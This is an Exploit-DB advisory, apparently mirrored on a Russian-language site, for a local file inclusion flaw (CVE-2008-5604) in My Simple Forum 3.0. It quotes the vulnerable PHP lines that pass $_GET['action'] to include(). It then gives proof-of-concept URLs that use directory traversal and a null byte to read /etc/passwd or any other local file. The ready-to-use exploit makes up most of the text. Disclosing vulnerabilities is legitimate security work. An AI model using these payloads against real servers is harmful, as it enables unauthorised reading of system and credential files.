- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7342
- Проверка EDB
-
- Пройдено
- Автор
- CONDEMNED
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5604
- Дата публикации
- 2008-12-04
Код:
/*
$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $
My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
Bug discovered by cOndemned
Script download: http://drennansoft.com/index.php?action=download&id=1
Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura
*/
Source of index.php:
49. if(file_exists('site/'.$_GET['action'].'.php')) {
50. include('site/'.$_GET['action'].'.php');
51. } else {
local file inclusion on line 50
Proof of concept:
http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00
# milw0rm.com [2008-12-04]- Источник
- www.exploit-db.com
